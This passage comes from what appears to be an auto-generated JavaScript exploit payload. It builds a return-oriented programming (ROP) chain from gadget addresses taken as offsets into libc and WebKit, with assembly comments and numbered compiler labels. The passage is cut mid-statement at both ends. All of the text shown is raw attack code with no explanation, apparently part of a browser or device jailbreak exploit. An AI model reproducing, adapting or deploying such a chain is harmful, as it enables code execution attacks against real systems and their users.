set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12993: db([2, 0]); // 0x2 set_gadget(libc_base+763368,); //pop rcx //L12994: db([2, 0]); // 0x2 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+585664, //L12996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12996: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+585720, //L12997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12997: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+585792, //L13000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13000: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+585848, //L13001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13001: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+585936, //L13003 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L13003: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13004: db([4, 
0]); // 0x4 set_gadget(libc_base+144605,); //pop rdi //L13005: db([4, 0]); // 0x4 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+586128, //L13009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+586096, //L13007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+586112, //L13008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13006: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L13007: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13008: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13009: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+586232, //L13011 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+586216, //L13010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13010: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13011: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+586328, //L13013 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L13012: db([4294959104, 4294967295]); // -0x2000 set_gadget(libc_base+759608,); //pop rax //L13013: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+586408, //L13015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop 
rcx ]); //L13015: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+586464, //L13016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13016: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L13018: db([3, 0]); // 0x3 set_gadget(libc_base+763368,); //pop rcx //L13019: db([3, 0]); // 0x3 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+586616, //L13021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13021: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+586672, //L13022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13022: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+586744, //L13025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13025: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+586800, //L13026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13026: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub 
rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+586888, //L13028 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L13028: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13029: db([65, 0]); // 0x41 set_gadget(libc_base+144605,); //pop rdi //L13030: db([65, 0]); // 0x41 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+587080, //L13034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+587048, //L13032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+587064, //L13033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13031: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L13032: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13033: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13034: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+587184, //L13036 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+587168, //L13035 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13035: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13036: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+587280, //L13038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L13037: db([4294959104, 4294967295]); // -0x2000 set_gadget(libc_base+759608,); //pop rax //L13038: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, 
//add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+587360, //L13040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13040: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+587416, //L13041 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13041: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L13043: db([7, 0]); // 0x7 set_gadget(libc_base+763368,); //pop rcx //L13044: db([7, 0]); // 0x7 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+587568, //L13046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13046: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+587624, //L13047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13047: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+587696, //L13050 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13050: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+587752, //L13051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13051: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+587896, //L13055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+587880, //L13054 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13053: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L13054: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13055: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+588080, //L13058 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+588096, //L13059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+588048, //L13056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+588064, //L13057 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13056: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L13057: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13058: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13059: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+588256, //L13063 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+588224, //L13061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+588240, 
//L13062 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13060: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L13061: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13062: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13063: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+588360, //L13065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+588344, //L13064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13064: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13065: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+588456, //L13067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L13066: db([4294959104, 4294967295]); // -0x2000 set_gadget(libc_base+759608,); //pop rax //L13067: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+588536, //L13069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13069: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+588592, //L13070 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13070: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 
//pop rax ]); //L13072: db([6, 0]); // 0x6 set_gadget(libc_base+763368,); //pop rcx //L13073: db([6, 0]); // 0x6 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+588744, //L13075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13075: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+588800, //L13076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13076: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+588872, //L13079 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13079: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+588928, //L13080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13080: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+589072, //L13084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+589056, //L13083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13082: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L13083: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13084: db([0, 
0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+589256, //L13087 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+589272, //L13088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+589224, //L13085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+589240, //L13086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13085: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L13086: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13087: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13088: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+589432, //L13092 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+589400, //L13090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+589416, //L13091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13089: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L13090: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13091: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13092: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+589536, //L13094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+589520, //L13093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13093: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); 
//pop rax //L13094: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+589632, //L13096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L13095: db([4294959104, 4294967295]); // -0x2000 set_gadget(libc_base+759608,); //pop rax //L13096: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+589712, //L13098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13098: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+589768, //L13099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13099: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L13101: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L13102: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+589920, //L13104 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13104: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+589976, //L13105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); 
//L13105: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+590048, //L13108 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13108: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+590104, //L13109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13109: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+590248, //L13113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+590232, //L13112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13111: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L13112: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13113: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+590432, //L13116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+590448, //L13117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+590400, //L13114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+590416, //L13115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13114: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L13115: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L13116: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13117: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+590608, //L13121 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+590576, //L13119 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+590592, //L13120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13118: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L13119: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13120: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13121: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+590712, //L13123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+590696, //L13122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L13122: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L13123: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+590808, //L13125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L13124: db([4294959104, 4294967295]); // -0x2000 set_gadget(libc_base+759608,); //pop rax //L13125: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+590888, //L13127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13127: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+590944, //L13128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13128: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L13130: db([4, 0]); // 0x4 set_gadget(libc_base+763368,); //pop rcx //L13131: db([4, 0]); // 0x4 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+591096, //L13133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13133: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+591152, //L13134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13134: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+591224, //L13137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13137: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+591280, //L13138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13138: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 
4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+591368, //L13140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L13140: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L13142: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+591488, //L13145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+591472, //L13143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L13143: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L13145: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+591664, //L13148 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+591680, //L13149 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+591632, //L13146 webkit_base+660161, //mov [rsi], 